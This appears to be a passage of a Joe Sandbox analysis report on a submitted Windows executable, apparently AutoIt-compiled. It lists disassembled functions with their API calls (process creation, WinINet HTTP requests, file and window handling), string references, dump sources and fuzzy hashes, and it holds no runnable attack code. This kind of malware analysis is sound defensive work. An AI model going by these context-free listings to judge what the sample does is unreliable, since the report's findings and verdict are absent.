                                                                                      • GetWindowRect.USER32(00000000), ref: 00C75B7C
                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C75BD3
                                                                                      • GetClientRect.USER32(?,?), ref: 00C75BE0
                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C75C05
                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C75C2F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 895679908-0
                                                                                      • Opcode ID: 5081271993cbc065a35dc6ec66285121f8a6a0d1117831e3be27de50ae1670fa
                                                                                      • Instruction ID: 629b699b4e3e19c9c5b2598afc6c9c9c3cfd6a60f0df3b77c742de448ce3e4a7
                                                                                      • Opcode Fuzzy Hash: 5081271993cbc065a35dc6ec66285121f8a6a0d1117831e3be27de50ae1670fa
                                                                                      • Instruction Fuzzy Hash: 1B718131900B09AFDB20DFA9CE85BAEBBF5FF48704F104918E556A35A0D7B5EA44CB50
                                                                                      Function 00C300C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C300C6
                                                                                        • Part of subcall function 00C300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00CE070C,00000FA0,CCCCC5E3,?,?,?,?,00C523B3,000000FF), ref: 00C3011C
                                                                                        • Part of subcall function 00C300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00C523B3,000000FF), ref: 00C30127
                                                                                        • Part of subcall function 00C300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00C523B3,000000FF), ref: 00C30138
                                                                                        • Part of subcall function 00C300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C3014E
                                                                                        • Part of subcall function 00C300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C3015C
                                                                                        • Part of subcall function 00C300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C3016A
                                                                                        • Part of subcall function 00C300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C30195
                                                                                        • Part of subcall function 00C300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C301A0
                                                                                      • ___scrt_fastfail.LIBCMT ref: 00C300E7
                                                                                        • Part of subcall function 00C300A3: __onexit.LIBCMT ref: 00C300A9
                                                                                      Strings
                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C30122
                                                                                      • SleepConditionVariableCS, xrefs: 00C30154
                                                                                      • InitializeConditionVariable, xrefs: 00C30148
                                                                                      • kernel32.dll, xrefs: 00C30133
                                                                                      • WakeAllConditionVariable, xrefs: 00C30162
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                      • API String ID: 66158676-1714406822
                                                                                      • Opcode ID: deb592b73c740bcc8cad521f44a0488b0b979e3ab8237a63cee572e48e46b0a6
                                                                                      • Instruction ID: dc6ece1f8418497ab6f2270070478a26bf25bcb62cdbdf7eb51f258f83a26e2c
                                                                                      • Opcode Fuzzy Hash: deb592b73c740bcc8cad521f44a0488b0b979e3ab8237a63cee572e48e46b0a6
                                                                                      • Instruction Fuzzy Hash: C2213833A507116FE7216FE4AC96B2E33E4EB06B65F20013EF901E7691DFB09C008A90
                                                                                      Function 00C730F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                      • API String ID: 176396367-1603158881
                                                                                      • Opcode ID: 63ac9a01d1657a3ad7ca3453fe000aadcec2d504ba2169d874b1a502bfd9a511
                                                                                      • Instruction ID: 4fc390fe69ecf2fc44b4c771d03ba099afea422f4986e1818d7e50e6a679c811
                                                                                      • Opcode Fuzzy Hash: 63ac9a01d1657a3ad7ca3453fe000aadcec2d504ba2169d874b1a502bfd9a511
                                                                                      • Instruction Fuzzy Hash: 02E1F632A00556ABCB18DF78C8517EEBBB4BF44710F54C12AE46AB7240DB30AF85B790
                                                                                      Function 00C844C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharLowerBuffW.USER32(00000000,00000000,00CACC08), ref: 00C84527
                                                                                      • _wcslen.LIBCMT ref: 00C8453B
                                                                                      • _wcslen.LIBCMT ref: 00C84599
                                                                                      • _wcslen.LIBCMT ref: 00C845F4
                                                                                      • _wcslen.LIBCMT ref: 00C8463F
                                                                                      • _wcslen.LIBCMT ref: 00C846A7
                                                                                        • Part of subcall function 00C2F9F2: _wcslen.LIBCMT ref: 00C2F9FD
                                                                                      • GetDriveTypeW.KERNEL32(?,00CD6BF0,00000061), ref: 00C84743
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                      • API String ID: 2055661098-1000479233
                                                                                      • Opcode ID: ce964f07bc06ce735cef0cb9b9e3575a855dffca85bdf3eea13d8d3c2ec8b5bd
                                                                                      • Instruction ID: f6ab543bb81330903e82af0acdbcee9e7f7bde532b73e82030ea571f59842830
                                                                                      • Opcode Fuzzy Hash: ce964f07bc06ce735cef0cb9b9e3575a855dffca85bdf3eea13d8d3c2ec8b5bd
                                                                                      • Instruction Fuzzy Hash: F7B126716083039FC718EF28C890A6EB7E5BFA6728F50491DF4A6C7291E730D944DB96
                                                                                      Function 00C9AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00C9B198
                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C9B1B0
                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C9B1D4
                                                                                      • _wcslen.LIBCMT ref: 00C9B200
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C9B214
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C9B236
                                                                                      • _wcslen.LIBCMT ref: 00C9B332
                                                                                        • Part of subcall function 00C805A7: GetStdHandle.KERNEL32(000000F6), ref: 00C805C6
                                                                                      • _wcslen.LIBCMT ref: 00C9B34B
                                                                                      • _wcslen.LIBCMT ref: 00C9B366
                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C9B3B6
                                                                                      • GetLastError.KERNEL32(00000000), ref: 00C9B407
                                                                                      • CloseHandle.KERNEL32(?), ref: 00C9B439
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C9B44A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C9B45C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C9B46E
                                                                                      • CloseHandle.KERNEL32(?), ref: 00C9B4E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2178637699-0
                                                                                      • Opcode ID: b6dadc14eb5293a455aad2e506588566d0b3b477daf7ca665e2101a688ddf429
                                                                                      • Instruction ID: b5a8aa7ba803b0b4d8a8e503a6206523dae2da3d936dcf593ce183da7a799fde
                                                                                      • Opcode Fuzzy Hash: b6dadc14eb5293a455aad2e506588566d0b3b477daf7ca665e2101a688ddf429
                                                                                      • Instruction Fuzzy Hash: 73F1CC31608300AFCB14EF24D995B6EBBE1BF86314F14855DF8998B2A2DB30ED45DB52
                                                                                      Function 00C1326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemCount.USER32(00CE1990), ref: 00C52F8D
                                                                                      • GetMenuItemCount.USER32(00CE1990), ref: 00C5303D
                                                                                      • GetCursorPos.USER32(?), ref: 00C53081
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C5308A
                                                                                      • TrackPopupMenuEx.USER32(00CE1990,00000000,?,00000000,00000000,00000000), ref: 00C5309D
                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C530A9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                      • String ID: 0
                                                                                      • API String ID: 36266755-4108050209
                                                                                      • Opcode ID: 0626926988ad1f1c1d2ea2b0d1821e137d7cf6f6c422979175946080b4506aa8
                                                                                      • Instruction ID: f8d78dd76491d8501dbe58242d26f9e13917a574817d6b82d396b8e455f29db4
                                                                                      • Opcode Fuzzy Hash: 0626926988ad1f1c1d2ea2b0d1821e137d7cf6f6c422979175946080b4506aa8
                                                                                      • Instruction Fuzzy Hash: F5716E34600255BEEB21DF64DC89F9EBFA4FF02368F204206F924661E1C7B1AE94E754
                                                                                      Function 00CA6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?), ref: 00CA6DEB
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CA6E5F
                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CA6E81
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA6E94
                                                                                      • DestroyWindow.USER32(?), ref: 00CA6EB5
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C10000,00000000), ref: 00CA6EE4
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA6EFD
                                                                                      • GetDesktopWindow.USER32 ref: 00CA6F16
                                                                                      • GetWindowRect.USER32(00000000), ref: 00CA6F1D
                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CA6F35
                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CA6F4D
                                                                                        • Part of subcall function 00C29944: GetWindowLongW.USER32(?,000000EB), ref: 00C29952
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                      • String ID: 0$tooltips_class32
                                                                                      • API String ID: 2429346358-3619404913
                                                                                      • Opcode ID: e5eb1bb84b3a6f2eb479b38a84bf083fac208f66559ab0e6697f179613b62cde
                                                                                      • Instruction ID: d86adaad1d91b6df57930090250a799a0e0131a6fd329c620001859ce7f620d9
                                                                                      • Opcode Fuzzy Hash: e5eb1bb84b3a6f2eb479b38a84bf083fac208f66559ab0e6697f179613b62cde
                                                                                      • Instruction Fuzzy Hash: 45715874144245AFDB21CF58DC84FAABBE9FB8A308F08051EF999872A1C771AA45DB11
                                                                                      Function 00CA911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00CA9147
                                                                                        • Part of subcall function 00CA7674: ClientToScreen.USER32(?,?), ref: 00CA769A
                                                                                        • Part of subcall function 00CA7674: GetWindowRect.USER32(?,?), ref: 00CA7710
                                                                                        • Part of subcall function 00CA7674: PtInRect.USER32(?,?,00CA8B89), ref: 00CA7720
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00CA91B0
                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CA91BB
                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CA91DE
                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CA9225
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00CA923E
                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00CA9255
                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00CA9277
                                                                                      • DragFinish.SHELL32(?), ref: 00CA927E
                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CA9371
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                      • API String ID: 221274066-3440237614
                                                                                      • Opcode ID: 34e97296038a74aa4b0374cf80aa4b6bcf7f6143ca3769f13683c5322902017a
                                                                                      • Instruction ID: f340fa3b9d9a7f562813b4643dafe99d0cdad8092e4324f0a27b49054e7c89a0
                                                                                      • Opcode Fuzzy Hash: 34e97296038a74aa4b0374cf80aa4b6bcf7f6143ca3769f13683c5322902017a
                                                                                      • Instruction Fuzzy Hash: 32617F71108301AFD701DF94DC95EAFBBE8EF8A754F00091EF595931A1DB309A45DB52
                                                                                      Function 00C8C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C8C4B0
                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C8C4C3
                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C8C4D7
                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C8C4F0
                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C8C533
                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C8C549
                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C8C554
                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C8C584
                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C8C5DC
                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C8C5F0
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00C8C5FB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                      • String ID:
                                                                                      • API String ID: 3800310941-3916222277
                                                                                      • Opcode ID: 33b3c52a32e8c866b7b33777e47b1a5cea4066f15159bca8be76418d4d8c1ce6
                                                                                      • Instruction ID: 6ad501ce9e8873a833ac2a1e92689d190feff01f6e4a2d812fc46e7d1921f50a
                                                                                      • Opcode Fuzzy Hash: 33b3c52a32e8c866b7b33777e47b1a5cea4066f15159bca8be76418d4d8c1ce6
                                                                                      • Instruction Fuzzy Hash: 6C513BB1500608BFDB21AF61C9C8BBB7BBCEB09758F004419F955D7650DB34EA44AB74
                                                                                      Function 00CA856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00CA8592
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CA85A2
                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CA85AD
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CA85BA
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00CA85C8
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CA85D7
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00CA85E0
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CA85E7
                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CA85F8
                                                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00CAFC38,?), ref: 00CA8611
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00CA8621
                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00CA8641
                                                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00CA8671
                                                                                      • DeleteObject.GDI32(?), ref: 00CA8699
                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CA86AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 3840717409-0
                                                                                      • Opcode ID: cc9cf16b65e88e12cd5b2e3fd1d7c28602beecd6a3ff87cd97549ca9c752a4e6
                                                                                      • Instruction ID: 1ffe2f0452f7b42b5dd65a8ca35e6a6f798675042cb268a55b37665f26dcac73
                                                                                      • Opcode Fuzzy Hash: cc9cf16b65e88e12cd5b2e3fd1d7c28602beecd6a3ff87cd97549ca9c752a4e6
                                                                                      • Instruction Fuzzy Hash: 02410775600209AFDB119FA5CC88FAE7BB8FF8AB19F104159F915E7260DB309A05CB60
                                                                                      Function 00C814BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00C81502
                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00C8150B
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C81517
                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C815FB
                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00C81657
                                                                                      • VariantInit.OLEAUT32(?), ref: 00C81708
                                                                                      • SysFreeString.OLEAUT32(?), ref: 00C8178C
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C817D8
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C817E7
                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00C81823
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                      • API String ID: 1234038744-3931177956
                                                                                      • Opcode ID: 91976ebf3d85edc85f7d890464e5b5602023d5925339bc0733a6dc2f52476f8b
                                                                                      • Instruction ID: 578080c336b441c3062679b0290ddfb760ce8036f2f7355a43fa7e383d430df2
                                                                                      • Opcode Fuzzy Hash: 91976ebf3d85edc85f7d890464e5b5602023d5925339bc0733a6dc2f52476f8b
                                                                                      • Instruction Fuzzy Hash: A6D10531600119DBDB10AF66E885B7DB7F9BF46708F18806AFC46AB580DB30DD42EB65
                                                                                      Function 00C9B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
